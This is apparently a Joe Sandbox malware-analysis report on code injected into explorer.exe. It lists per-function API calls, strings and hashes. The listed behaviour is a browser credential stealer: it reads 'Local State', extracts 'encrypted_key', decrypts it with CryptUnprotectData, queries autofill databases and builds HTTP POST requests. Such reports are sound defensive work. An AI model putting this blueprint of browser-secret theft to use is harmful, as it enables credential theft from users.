API String ID: 2757140130-4052020286
Opcode ID: 57c82c3cbf5101a8d01906acdda81044cba127e5079e247b950309c65222a814
Instruction ID: fa36d84e03162e6d2eac8be794fc629c4c738971b61808a154d23eb96770e26d
Opcode Fuzzy Hash: 57c82c3cbf5101a8d01906acdda81044cba127e5079e247b950309c65222a814
Instruction Fuzzy Hash: 6A919A71208341ABD759DF24C880FAFBBE9AFC5744F04892CF58596262DB31EE45CB62

Uniqueness

Uniqueness Score: -1.00%

Function 000C3CE7 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 82
stringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 000C1000: GetProcessHeap.KERNEL32(00000008,?,000C1215,?,?,00000001,00000000,?), ref: 000C1003
Part of subcall function 000C1000: RtlAllocateHeap.NTDLL(00000000), ref: 000C100A

PathCombineW.SHLWAPI(00000000,00000000,*.*), ref: 000C3D18
FindFirstFileW.KERNELBASE(00000000,?,?,00000000), ref: 000C3D24
lstrcmpiW.KERNEL32(?,001162BC), ref: 000C3D46
lstrcmpiW.KERNEL32(?,001162C0), ref: 000C3D5A
PathCombineW.SHLWAPI(00000000,00000000,?), ref: 000C3D77
lstrcmpiW.KERNEL32(?,Local State), ref: 000C3D8C
PathCombineW.SHLWAPI(00000000,00000000,?), ref: 000C3DA9
FindNextFileW.KERNELBASE(00000000,00000010), ref: 000C3DC3
FindClose.KERNELBASE(00000000), ref: 000C3DD2

Strings

*.*, xrefs: 000C3D0F
Local State, xrefs: 000C3D86

Memory Dump Source

Source File: 00000012.00000002.1150604605.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c1000_explorer.jbxd

Similarity

API ID: CombineFindPathlstrcmpi$FileHeap$AllocateCloseFirstNextProcess
String ID: *.*$Local State
API String ID: 3923353463-3324723383
Opcode ID: 9ec96e3bec8b5511cee8f44dd03931939a1a18ed51cd38df3ff2b8a790fc42e8
Instruction ID: 30815c1b295ae06f3ee9263502575bc07f8d666fb8b3b69b0cd64374479553c9
Opcode Fuzzy Hash: 9ec96e3bec8b5511cee8f44dd03931939a1a18ed51cd38df3ff2b8a790fc42e8
Instruction Fuzzy Hash: 302192312002446BD758AB70AC48FEF76ACDF86755B14852DF852C2193EB7A8A888662

Uniqueness

Uniqueness Score: -1.00%

Function 000C1EBA Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 109
stringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 000C1B7C: lstrlenW.KERNEL32(00000000,00000000,00000000,000C2E1F,00000000,00000000,?,?,00000000,PathToExe,00000000,00000000), ref: 000C1B8C

FindFirstFileW.KERNELBASE(00000000,?,?,00000000), ref: 000C1F19
lstrcmpiW.KERNEL32(?,001162BC), ref: 000C1F3F
lstrcmpiW.KERNEL32(?,001162C0), ref: 000C1F57
lstrcmpiW.KERNEL32(?,?), ref: 000C1FD2

Part of subcall function 000C1E67: lstrlenW.KERNEL32(00000000,00000000,00000000,000C2D97), ref: 000C1E72
Part of subcall function 000C1E67: RtlComputeCrc32.NTDLL(00000000,00000000,00000000), ref: 000C1E7D

FindNextFileW.KERNELBASE(00000000,00000010), ref: 000C2004
FindClose.KERNEL32(00000000), ref: 000C2013

Part of subcall function 000C1B1B: lstrlenW.KERNEL32(?,00000000,00000000,?,?,000C307C), ref: 000C1B3B
Part of subcall function 000C1B1B: lstrlenW.KERNEL32(00116574,?,?,000C307C), ref: 000C1B40
Part of subcall function 000C1B1B: lstrcatW.KERNEL32(00000000,?), ref: 000C1B58
Part of subcall function 000C1B1B: lstrcatW.KERNEL32(00000000,00116574), ref: 000C1B5C

Strings

\*.*, xrefs: 000C1EE9
*.*, xrefs: 000C1EFB

Memory Dump Source

Source File: 00000012.00000002.1150604605.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c1000_explorer.jbxd

Similarity

API ID: lstrlen$Findlstrcmpi$Filelstrcat$CloseComputeCrc32FirstNext
String ID: *.*$\*.*
API String ID: 232625764-1692270452
Opcode ID: 295e11deb2de52700b090549d76f3243b1d181b1d6c4bcb5fa1ea4cb67570b82
Instruction ID: 9f143c0ce7933780c88c600034e35f74e562205534e6121adbf45d35d51923f8
Opcode Fuzzy Hash: 295e11deb2de52700b090549d76f3243b1d181b1d6c4bcb5fa1ea4cb67570b82
Instruction Fuzzy Hash: 3A316F307043419BCB68EB749988FEE76EA9BCA340F14493DF945C3253EB768C469652

Uniqueness

Uniqueness Score: -1.00%

Function 000C3C12 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 75
encryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 000C1D32: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000), ref: 000C1D4A
Part of subcall function 000C1D32: CloseHandle.KERNEL32(00000000), ref: 000C1D57

Part of subcall function 000C1DF9: CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 000C1E0E
Part of subcall function 000C1DF9: GetFileSize.KERNEL32(00000000,00000000,00000000,?,000C3DB6), ref: 000C1E1E
Part of subcall function 000C1DF9: ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000), ref: 000C1E3E
Part of subcall function 000C1DF9: CloseHandle.KERNEL32(00000000), ref: 000C1E59

Part of subcall function 000C3121: StrStrIA.SHLWAPI(00000000,"encrypted_key":"), ref: 000C3131
Part of subcall function 000C3121: lstrlen.KERNEL32("encrypted_key":",?,000C3DB6), ref: 000C313E
Part of subcall function 000C3121: StrStrIA.SHLWAPI("encrypted_key":",0011693C), ref: 000C314D

Part of subcall function 000C1289: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,000C3C59,00000000), ref: 000C1298
Part of subcall function 000C1289: CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 000C12B6
Part of subcall function 000C1289: CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 000C12E3

RtlCompareMemory.NTDLL(00000000,IDPAP,00000005), ref: 000C3C82
CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 000C3CAC

Strings

DPAP, xrefs: 000C3C68
DPAP, xrefs: 000C3C60
IDPAP, xrefs: 000C3C7C, 000C3C80
, xrefs: 000C3CB6

Memory Dump Source

Source File: 00000012.00000002.1150604605.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c1000_explorer.jbxd

Similarity

API ID: File$Crypt$BinaryCloseCreateHandleStringlstrlen$CompareDataMemoryReadSizeUnprotect
String ID: $DPAP$DPAP$IDPAP
API String ID: 3076719866-957854035
Opcode ID: eff7c85b855087a2685a3b26af8eb85165dc727f6c752b0a48d69663756ca7ce
Instruction ID: 4f4d684758de468a5ce783ec0cc434afbd57d8ed7c6d205fbf3330b392d63e5c
Opcode Fuzzy Hash: eff7c85b855087a2685a3b26af8eb85165dc727f6c752b0a48d69663756ca7ce
Instruction Fuzzy Hash: 9221DE71604305ABD720EB689DC0FBFB2ECAB84700F58892EF845D7242EB74CE448792

Uniqueness

Uniqueness Score: -1.00%

Function 001291C9 Relevance: 6.3, APIs: 4, Instructions: 300
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000012.00000002.1150604605.0000000000127000.00000040.80000000.00040000.00000000.sdmp, Offset: 00127000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_127000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e3f11dd9baed1755c8aca9156ef9829457ad9f44f9f4f0d263228a682291bb9
Instruction ID: d03b8727961a58dc73989f65d962978dbd166509424c6d0d86224803aaf77b4a
Opcode Fuzzy Hash: 0e3f11dd9baed1755c8aca9156ef9829457ad9f44f9f4f0d263228a682291bb9
Instruction Fuzzy Hash: 03916B729453A25BD7219EBCEC803A57BA1FF12320F2C0778C9E1CB2C6E7605816C750

Uniqueness

Uniqueness Score: -1.00%

Function 000C49A0 Relevance: 3.0, APIs: 2, Instructions: 26nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 000C11B0: VirtualQuery.KERNEL32(?,?,0000001C), ref: 000C11BD

RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 000C49C4
NtUnmapViewOfSection.NTDLL(000000FF), ref: 000C49CD

Memory Dump Source

Source File: 00000012.00000002.1150604605.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c1000_explorer.jbxd

Similarity

API ID: MemoryMoveQuerySectionUnmapViewVirtual
String ID:
API String ID: 1675517319-0
Opcode ID: f89eb49560afecab275acaee79c615d25295824f6de2bb599ddd9072737b4ea7
Instruction ID: 40c4fb7b30d15709138465f96c6f5148f4c1ddb6d0f7e6f1250fdf2be7d78d28
Opcode Fuzzy Hash: f89eb49560afecab275acaee79c615d25295824f6de2bb599ddd9072737b4ea7
Instruction Fuzzy Hash: 27E04832405230ABC654B774FE1AFDF3BACEF96361F11C51DB16582492CA358880C651

Uniqueness

Uniqueness Score: -1.00%

Function 000C1000 Relevance: 3.0, APIs: 2, Instructions: 6memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,?,000C1215,?,?,00000001,00000000,?), ref: 000C1003
RtlAllocateHeap.NTDLL(00000000), ref: 000C100A

Memory Dump Source

Source File: 00000012.00000002.1150604605.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c1000_explorer.jbxd

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: 59b70a970a31968b48f3839f4c6a4ff264437a01013d66fb170e8d70dfef7e78
Instruction ID: 2558459371a11a0795f0bf97134856d5a0ddfd87831a2101540179f5f651ff12
Opcode Fuzzy Hash: 59b70a970a31968b48f3839f4c6a4ff264437a01013d66fb170e8d70dfef7e78
Instruction Fuzzy Hash: ACA002B55512007BDD4857A59F0DA5A3559A7C5701F00C544714585451DEA654448721

Uniqueness

Uniqueness Score: -1.00%

Function 000C6320 Relevance: 1.5, APIs: 1, Instructions: 34COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNELBASE(001220A4,00000001,00000000,0000000A,00112F35,000C2A4A,00000000,?), ref: 000CBE0A

Memory Dump Source

Source File: 00000012.00000002.1150604605.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c1000_explorer.jbxd

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: 2bdd03f9feea4e02901fdc3fc3d187381d3a9339238f7048150a26f38f3ba999
Instruction ID: 5e8340073b616a2773717f944ac2180185f23d38d771091b86f679fdb2e7d9fd
Opcode Fuzzy Hash: 2bdd03f9feea4e02901fdc3fc3d187381d3a9339238f7048150a26f38f3ba999
Instruction Fuzzy Hash: 24E01A217C839071E630B3F87D17F9E1555ABA4F11F205A29B612B90C7DBE681611026

Uniqueness

Uniqueness Score: -1.00%

Function 000C3A4E Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 147
stringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 000C1D32: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000), ref: 000C1D4A
Part of subcall function 000C1D32: CloseHandle.KERNEL32(00000000), ref: 000C1D57

Part of subcall function 000C1000: GetProcessHeap.KERNEL32(00000008,?,000C1215,?,?,00000001,00000000,?), ref: 000C1003
Part of subcall function 000C1000: RtlAllocateHeap.NTDLL(00000000), ref: 000C100A

GetTempPathW.KERNEL32(00000104,00000000), ref: 000C3A78
GetTempFileNameW.KERNELBASE(00000000,00000000,00000000,00000000), ref: 000C3A84
DeleteFileW.KERNEL32(00000000), ref: 000C3A8B
CopyFileW.KERNEL32(?,00000000,00000000), ref: 000C3A97
lstrlen.KERNEL32(00000000,?,?,?,?,00000000,00000000,?), ref: 000C3B3D
lstrlen.KERNEL32(00000000), ref: 000C3B44
wsprintfA.USER32 ref: 000C3B63
lstrlen.KERNEL32(00000000), ref: 000C3B6F
lstrcat.KERNEL32(00000000,?), ref: 000C3B97
lstrlen.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 000C3BC0
DeleteFileW.KERNEL32(00000000,00000000,?), ref: 000C3BFB

Strings

SELECT name,value FROM autofill, xrefs: 000C3AB8
%s = %s, xrefs: 000C3B5D
AUTOFILL, xrefs: 000C3BCB, 000C3BD0, 000C3BDA

Memory Dump Source

Source File: 00000012.00000002.1150604605.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c1000_explorer.jbxd

Similarity

API ID: File$lstrlen$DeleteHeapTemp$AllocateCloseCopyCreateHandleNamePathProcesslstrcatwsprintf
String ID: %s = %s$AUTOFILL$SELECT name,value FROM autofill
API String ID: 2923052733-3488123210
Opcode ID: d4fac63e5a36596d2b48f2348241b3e92358babbea9b694d06faba4893ee151f
Instruction ID: 9c915a383ba98e756151342e36e381bf34d787f20c3ea01ab1290fabac994808
Opcode Fuzzy Hash: d4fac63e5a36596d2b48f2348241b3e92358babbea9b694d06faba4893ee151f
Instruction Fuzzy Hash: 0241A130214245ABD715AB74CC91FBF76E9EF89744F04882CF946A3253DB35DD428BA2

Uniqueness

Uniqueness Score: -1.00%

Function 000C1438 Relevance: 14.3, APIs: 4, Strings: 4, Instructions: 283
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 000C1000: GetProcessHeap.KERNEL32(00000008,?,000C1215,?,?,00000001,00000000,?), ref: 000C1003
Part of subcall function 000C1000: RtlAllocateHeap.NTDLL(00000000), ref: 000C100A

Part of subcall function 000C106C: lstrlen.KERNEL32(002EBC76,00000000,00000000,00000000,000C1474,75572B62,002EBC76,00000000), ref: 000C1074
Part of subcall function 000C106C: MultiByteToWideChar.KERNEL32(00000000,00000000,002EBC76,00000001,00000000,00000000), ref: 000C1086

Part of subcall function 000C12F1: RtlZeroMemory.NTDLL(?,00000018), ref: 000C1303

RtlZeroMemory.NTDLL(?,0000003C), ref: 000C14D0
wsprintfW.USER32 ref: 000C1608
wsprintfW.USER32 ref: 000C1673
RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 000C173D

Strings

Content-Type: application/x-www-form-urlencoded, xrefs: 000C1697
Accept: */*Referer: %S, xrefs: 000C15FE
Host: %s, xrefs: 000C166D
POST, xrefs: 000C15B9

Memory Dump Source

Source File: 00000012.00000002.1150604605.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c1000_explorer.jbxd

Similarity

API ID: Memory$HeapZerowsprintf$AllocateByteCharMoveMultiProcessWidelstrlen
String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$Host: %s$POST
API String ID: 4204651544-1701262698
Opcode ID: 9c6d4eb4366376bd6fff1ca8068f82f159a04b7353e35e631f26ddb647521432
Instruction ID: b2250bcb23b8a03ef0c7589776a51cf0d0285d1771b13c44a2038c683a36a2c1
Opcode Fuzzy Hash: 9c6d4eb4366376bd6fff1ca8068f82f159a04b7353e35e631f26ddb647521432
Instruction Fuzzy Hash: 3EA19870608340AFD3549F68DD84FAFBBE8AB8A340F14492DF985C3253DA75D9448B92

Uniqueness

Uniqueness Score: -1.00%

Function 000CA21C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 116
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memcpy.NTDLL(?,?,?), ref: 000CA263
memcpy.NTDLL(?,?,?), ref: 000CA287
ReadFile.KERNELBASE(?,?,?,?,?), ref: 000CA2E9
memset.NTDLL ref: 000CA354

Strings

winRead, xrefs: 000CA323

Memory Dump Source

Source File: 00000012.00000002.1150604605.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c1000_explorer.jbxd

Similarity

API ID: memcpy$FileReadmemset
String ID: winRead
API String ID: 2051157613-2759563040
Opcode ID: 5457f5c91a5a71e1e5f118cd2a5869baf09cef7df3d797bc42169a9e935bc991
Instruction ID: b0aa70cec27be0f788bec67230396efe5bfa4f6eccb9a45512a716e07be0c8b2
Opcode Fuzzy Hash: 5457f5c91a5a71e1e5f118cd2a5869baf09cef7df3d797bc42169a9e935bc991
Instruction Fuzzy Hash: A3316832709248ABC790DF58CC81E9F77E6EFC9344F84592CF89187211D631ED458BA2

Uniqueness

Uniqueness Score: -1.00%

Function 000C2FA0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 113
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

StrStrIW.SHLWAPI(?,?), ref: 000C2FBB
RegOpenKeyExW.KERNEL32(?,?,00000000,00020119,?), ref: 000C3054
RegEnumKeyExW.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 000C30C4
RegCloseKey.KERNEL32(?), ref: 000C30D2

Part of subcall function 000C1BAD: RegOpenKeyExW.ADVAPI32(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,000C1CAA,PortNumber,00000000,00000000), ref: 000C1BE6
Part of subcall function 000C1BAD: RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 000C1C04
Part of subcall function 000C1BAD: RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 000C1C3D
Part of subcall function 000C1BAD: RegCloseKey.ADVAPI32(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,000C1CAA,PortNumber,00000000,00000000), ref: 000C1C60

Part of subcall function 000C1D8D: lstrlenW.KERNEL32(00000000,00000000,?,000C2FE5,PathToExe,00000000,00000000), ref: 000C1D94
Part of subcall function 000C1D8D: StrStrIW.SHLWAPI(00000000,.exe), ref: 000C1DB8
Part of subcall function 000C1D8D: StrRChrIW.SHLWAPI(00000000,00000000,0000005C), ref: 000C1DCD
Part of subcall function 000C1D8D: lstrlenW.KERNEL32(00000000,?,000C2FE5,PathToExe,00000000,00000000), ref: 000C1DE4

Part of subcall function 000C1CC6: SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,00000000), ref: 000C1CDE

Strings

PathToExe, xrefs: 000C2FCE

Memory Dump Source

Source File: 00000012.00000002.1150604605.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c1000_explorer.jbxd

Similarity

API ID: CloseOpenQueryValuelstrlen$EnumFolderPath
String ID: PathToExe
API String ID: 1799103994-1982016430
Opcode ID: 0aacf28ba89f43b3c02cd6d90e3593381c0272b8e64605ad61bfc996bef24fc9
Instruction ID: b7eb6b597b9cf28e1a5324805db8879ed04aa4301242d43fe01c9f6a0abd2c55
Opcode Fuzzy Hash: 0aacf28ba89f43b3c02cd6d90e3593381c0272b8e64605ad61bfc996bef24fc9
Instruction Fuzzy Hash: 36319171600211AF8729AF218C19EEF7AE9EFC5350F10852CF85587242EA75CD41DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 000C487F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 52
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 000C1000: GetProcessHeap.KERNEL32(00000008,?,000C1215,?,?,00000001,00000000,?), ref: 000C1003
Part of subcall function 000C1000: RtlAllocateHeap.NTDLL(00000000), ref: 000C100A

wsprintfW.USER32 ref: 000C48B0
RegCreateKeyExW.KERNEL32(80000001,00000000,00000000,00000000,00000000,000F003F,00000000,?,?), ref: 000C48D5
RegCloseKey.ADVAPI32(?), ref: 000C48E2

Strings

Software, xrefs: 000C48A3
%s\%08x, xrefs: 000C48AA

Memory Dump Source

Source File: 00000012.00000002.1150604605.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c1000_explorer.jbxd

Similarity

API ID: Heap$AllocateCloseCreateProcesswsprintf
String ID: %s\%08x$Software
API String ID: 1800864259-1658101971
Opcode ID: 7a84dc8c45844221624920296c23f0fe8465326c70974ad0cdaea9e3b6863a1e
Instruction ID: dda34c8d6fd7e9eb8b36bc5efe77587f41651be419d0c883f1d0559ce494c810
Opcode Fuzzy Hash: 7a84dc8c45844221624920296c23f0fe8465326c70974ad0cdaea9e3b6863a1e
Instruction Fuzzy Hash: 8F01FD71600108BFEB189B94DD8AEFF77ACEB46740B10016EF905A3142EBB26E85D661

Uniqueness

Uniqueness Score: -1.00%

Function 000C4125 Relevance: 7.6, APIs: 5, Instructions: 64
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_alloca_probe.NTDLL ref: 000C412A
RegOpenKeyW.ADVAPI32(80000001,?,?), ref: 000C4143
RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 000C4171
RegCloseKey.ADVAPI32(?), ref: 000C41D6

Part of subcall function 000C1B1B: lstrlenW.KERNEL32(?,00000000,00000000,?,?,000C307C), ref: 000C1B3B
Part of subcall function 000C1B1B: lstrlenW.KERNEL32(00116574,?,?,000C307C), ref: 000C1B40
Part of subcall function 000C1B1B: lstrcatW.KERNEL32(00000000,?), ref: 000C1B58
Part of subcall function 000C1B1B: lstrcatW.KERNEL32(00000000,00116574), ref: 000C1B5C

Part of subcall function 000C3F98: wsprintfW.USER32 ref: 000C4020

Part of subcall function 000C1011: GetProcessHeap.KERNEL32(00000000,00000000,?,000C1C5A,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,000C1CAA), ref: 000C1020
Part of subcall function 000C1011: HeapFree.KERNEL32(00000000), ref: 000C1027

RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 000C41C7

Memory Dump Source

Source File: 00000012.00000002.1150604605.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c1000_explorer.jbxd

Similarity

API ID: EnumHeaplstrcatlstrlen$CloseFreeOpenProcess_alloca_probewsprintf
String ID:
API String ID: 801677237-0
Opcode ID: 6e296067e2e89e03b35ac5c0ce3f9da729eb0159325edea4a1d572e3bc648eaa
Instruction ID: 549a5f754c869debb3793824cd61e6c237de1c40cf193b55fd3b37a689554a1a
Opcode Fuzzy Hash: 6e296067e2e89e03b35ac5c0ce3f9da729eb0159325edea4a1d572e3bc648eaa
Instruction Fuzzy Hash: 221182B1204200BFE7199B10CD45EFF76EDFB88344F00852DB889D2151EB759D848A62

Uniqueness

Uniqueness Score: -1.00%

Function 000CB689 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 202
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.NTDLL ref: 000CB6E3
CreateFileW.KERNELBASE(00000000,?,00000003,00000000,-00000003,?,00000000), ref: 000CB77D

Strings

winOpen, xrefs: 000CB830
psow, xrefs: 000CB8A3

Memory Dump Source

Source File: 00000012.00000002.1150604605.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c1000_explorer.jbxd

Similarity

API ID: CreateFilememset
String ID: psow$winOpen
API String ID: 2416746761-4101858489
Opcode ID: 037459dcea9c52a12897621e0de9fc226e13d9c2fc237a183af2661562f76b98
Instruction ID: 0b252b0d36fa463042c47bf05790a62bfc2b74177e09a4d81df58eaf8d3e1bfb
Opcode Fuzzy Hash: 037459dcea9c52a12897621e0de9fc226e13d9c2fc237a183af2661562f76b98
Instruction Fuzzy Hash: B6718F71A08702AFD760DF28C882B5EBBE4FF88724F104A2DF85597292D774D954CB92

Uniqueness

Uniqueness Score: -1.00%

Function 000C2031 Relevance: 6.1, APIs: 4, Instructions: 82
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyW.ADVAPI32(?,?,?), ref: 000C2045

Part of subcall function 000C1000: GetProcessHeap.KERNEL32(00000008,?,000C1215,?,?,00000001,00000000,?), ref: 000C1003
Part of subcall function 000C1000: RtlAllocateHeap.NTDLL(00000000), ref: 000C100A

RegEnumKeyExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 000C207C
RegCloseKey.ADVAPI32(?), ref: 000C2108

Part of subcall function 000C1B1B: lstrlenW.KERNEL32(?,00000000,00000000,?,?,000C307C), ref: 000C1B3B
Part of subcall function 000C1B1B: lstrlenW.KERNEL32(00116574,?,?,000C307C), ref: 000C1B40
Part of subcall function 000C1B1B: lstrcatW.KERNEL32(00000000,?), ref: 000C1B58
Part of subcall function 000C1B1B: lstrcatW.KERNEL32(00000000,00116574), ref: 000C1B5C

RegEnumKeyExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 000C20F2

Memory Dump Source

Source File: 00000012.00000002.1150604605.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c1000_explorer.jbxd

Similarity

API ID: EnumHeaplstrcatlstrlen$AllocateCloseOpenProcess
String ID:
API String ID: 1077800024-0
Opcode ID: 2d909729e968159b6bc95442526653f96742b155565358198f8b165f15543d36
Instruction ID: 5a608fbfb7b326993e20a172006eec19043a3884f14c7ea807ff068182d7267e
Opcode Fuzzy Hash: 2d909729e968159b6bc95442526653f96742b155565358198f8b165f15543d36
Instruction Fuzzy Hash: 38219DB1208201BFD7199B25CC49EAFBAEDEF89344F10892DF88992552DF75CC45CB22

Uniqueness

Uniqueness Score: -1.00%

Function 000C1DF9 Relevance: 6.0, APIs: 4, Instructions: 50fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 000C1E0E
GetFileSize.KERNEL32(00000000,00000000,00000000,?,000C3DB6), ref: 000C1E1E
CloseHandle.KERNEL32(00000000), ref: 000C1E59

Part of subcall function 000C1000: GetProcessHeap.KERNEL32(00000008,?,000C1215,?,?,00000001,00000000,?), ref: 000C1003
Part of subcall function 000C1000: RtlAllocateHeap.NTDLL(00000000), ref: 000C100A

ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000), ref: 000C1E3E

Memory Dump Source

Source File: 00000012.00000002.1150604605.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c1000_explorer.jbxd

Similarity

API ID: File$Heap$AllocateCloseCreateHandleProcessReadSize
String ID:
API String ID: 2517252058-0
Opcode ID: 977703aeb906bc0c9d466995dee5fe3c1dc7e160045b31de61473e1d3ac6d46b
Instruction ID: 31ee0569f08d9c51df46b4b5df302de4c5d0c743b90900d4406ac74c86f0286a
Opcode Fuzzy Hash: 977703aeb906bc0c9d466995dee5fe3c1dc7e160045b31de61473e1d3ac6d46b
Instruction Fuzzy Hash: B4F0A4322002187BD2241B26DC88FEF7A9DDB4BBB9B12021DF915D2192DB636C418171

Uniqueness

Uniqueness Score: -1.00%

Function 000C3015 Relevance: 4.5, APIs: 3, Instructions: 43registryCOMMON

Download Yara Rule

APIs

Part of subcall function 000C1011: GetProcessHeap.KERNEL32(00000000,00000000,?,000C1C5A,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,000C1CAA), ref: 000C1020
Part of subcall function 000C1011: HeapFree.KERNEL32(00000000), ref: 000C1027

Part of subcall function 000C1000: GetProcessHeap.KERNEL32(00000008,?,000C1215,?,?,00000001,00000000,?), ref: 000C1003
Part of subcall function 000C1000: RtlAllocateHeap.NTDLL(00000000), ref: 000C100A

RegOpenKeyExW.KERNEL32(?,?,00000000,00020119,?), ref: 000C3054
RegEnumKeyExW.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 000C30C4
RegCloseKey.KERNEL32(?), ref: 000C30D2

Memory Dump Source

Source File: 00000012.00000002.1150604605.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c1000_explorer.jbxd

Similarity

API ID: Heap$Process$AllocateCloseEnumFreeOpen
String ID:
API String ID: 1066184869-0
Opcode ID: 2f7730e87ad0e2b0e0a583bb3e5f05418332778f104097ccc59d726e962d3cb3
Instruction ID: 2dc91f3ea074e602c56f9ca58d3e2f288d788da1c9a98dd4ce25845e3d38f871
Opcode Fuzzy Hash: 2f7730e87ad0e2b0e0a583bb3e5f05418332778f104097ccc59d726e962d3cb3
Instruction Fuzzy Hash: 90018632204250BBC7259F21DC15FEF7FA9EFCA390F20842DF85982153DA758995DBA1

Uniqueness

Uniqueness Score: -1.00%

